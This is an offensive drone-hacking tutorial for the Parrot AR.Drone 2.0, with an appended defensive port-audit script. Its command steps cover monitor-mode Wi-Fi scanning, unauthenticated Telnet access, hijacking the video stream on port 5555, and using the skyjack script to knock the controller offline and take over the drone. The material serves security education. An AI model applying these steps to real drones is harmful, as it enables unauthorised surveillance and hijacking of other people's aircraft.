Tutorial One: Hacking the Parrot AR.DRONE 2.0
This tutorial aims to educate users on the various attack vectors that affect the Parrot AR.DRONE 2.0. Notably, it is one of the most common commercial drones on the market today and also one of the most weakly protected. We at DroneSec hope the reader will come to understand the vulnerabilities and be able to secure their own drone and (hopefully) others' too, given the chance.
We believe many Drone Security positions will soon open up, and it's essential that people understand at least the fundamentals.
Before you start
When approaching a topic like this, it is extremely important to remember that technology builds upon itself - this is not a magical snowflake type of complex hardware/software that requires re-learning. Many of the concepts involved have been driving systems for years. The operating system (OS) is known as BusyBox - a quick Google search will show you that it's an embedded Linux system used in many places (IoT especially). This means that if you know Linux, you know how to navigate the file system of this drone!
Similarly, the underlying Linux system can be reached through common connection utilities such as SSH, FTP and Telnet; if you can type "telnet 192.168.1.1" you can access the AR 2.0 Drone!
Our 'hacking' steps after gaining access to the filesystem include hijacking the video stream and the controls of the drone. These take a little more ingenuity but are very doable with just a few commands.
If you do not have access to a physical drone, you may be able to replicate some steps with a BusyBox Linux OS (virtual machine) and a WAP.
There are multiple ways of achieving control over this type of drone! Use this as a general guide only; feel free to stray from the path. We have tried not to give everything away, but some items are given as examples. For any issues or help, do not hesitate to contact email@example.com or join the Facebook or Reddit discussion groups.
This is the offensive guide. A defensive guide is in the works!
Part 1: Detect & Identify
- Insert a Wi-Fi adapter and connect it to Kali (we use the TP-Link TL-WN722N, but any small adapter with monitor mode should do)
- iwconfig (e.g. wlan0) (if not detected, switch USB ports and connect again)
- pkill NetworkManager
- airmon-ng check
- airmon-ng check kill
- airmon-ng start wlan0 1 (e.g. might become mon0)
- iwconfig (check here for the new monitoring adapter name)
- airodump-ng mon0
- Check for the ARdrone Wi-Fi network and note its channel.
- Check MAC addresses to determine the correct Drone AP
Part 2: Gain Access
- After identifying the correct AP, you’ll want to connect to it via wifi. Before though:
- airmon-ng stop mon0
- service network-manager start
- Connect to arDrone wifi
- ifconfig (to find the IP address/gateway)
- Perform an nmap scan against the drone
- Identify the ports and attempt to gain filesystem access (telnet)
- Navigate the filesystem to find the Drone Software Version
- pkill NetworkManager again and start your adapter in monitor mode
Part 3: Active Decode
- Ensure the correct drone has been identified (Part 2)
- Maintain access to the drone via telnet
- Use ffmpeg, ffplay or tcpdump to gain access to a live stream
- E.g. ffplay http://192.168.1.1:5555 (as port 5555 is used for video transmission)
Part 4: Intercept & Control
- Find and download the skyjack script or Jeff script.
- Attempt to gain access, knock the controller offline, and take control of live camera feed.
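For owners who want to check their own drone for the exposure that Parts 2 and 3 rely on, here is an added example (not part of the original tutorial) that reports whether the Telnet, FTP and video ports answer and whether Telnet shows a login prompt. The address 192.168.1.1 and port 5555 come from the page; ports 21 and 23 are the standard FTP and Telnet ports and are assumed, and the function names and the login-prompt heuristic are illustrative.

```python
import socket

# 5555 is the video port named in this tutorial; 21 and 23 are the standard
# FTP/Telnet ports (assumed to be the ones the drone uses).
SERVICES = {21: "ftp", 23: "telnet", 5555: "video"}


def strip_iac(data: bytes) -> bytes:
    """Drop Telnet option negotiation (IAC WILL/WONT/DO/DONT <opt>) from a banner."""
    out, i = bytearray(), 0
    while i < len(data):
        if data[i] == 0xFF and i + 2 < len(data) and data[i + 1] in (0xFB, 0xFC, 0xFD, 0xFE):
            i += 3  # skip the 3-byte negotiation sequence
        else:
            out.append(data[i])
            i += 1
    return bytes(out)


def probe(host: str, port: int, timeout: float = 2.0):
    """Return (reachable, banner); banner is whatever the service sends unprompted."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            try:
                banner = s.recv(256)
            except OSError:  # includes timeouts: connected, but nothing sent
                banner = b""
        return True, banner
    except OSError:
        return False, b""


def classify(name: str, reachable: bool, banner: bytes) -> str:
    """Turn a probe result into a finding for the report."""
    if not reachable:
        return "closed"
    # Heuristic (assumption): no login prompt in the first bytes of a Telnet
    # session suggests a shell is handed out without credentials.
    if name == "telnet" and b"login" not in strip_iac(banner).lower():
        return "open-no-login-prompt"
    return "open"


def audit(host: str, services=SERVICES, timeout: float = 2.0):
    """Return (port, name, finding) for each service, sorted by port."""
    return [(port, name, classify(name, *probe(host, port, timeout)))
            for port, name in sorted(services.items())]


if __name__ == "__main__":
    for port, name, finding in audit("192.168.1.1"):
        print(f"{port:>5} {name:<7} {finding}")
```

Any result other than "closed" means the service is reachable by every client that joins the drone's Wi-Fi network.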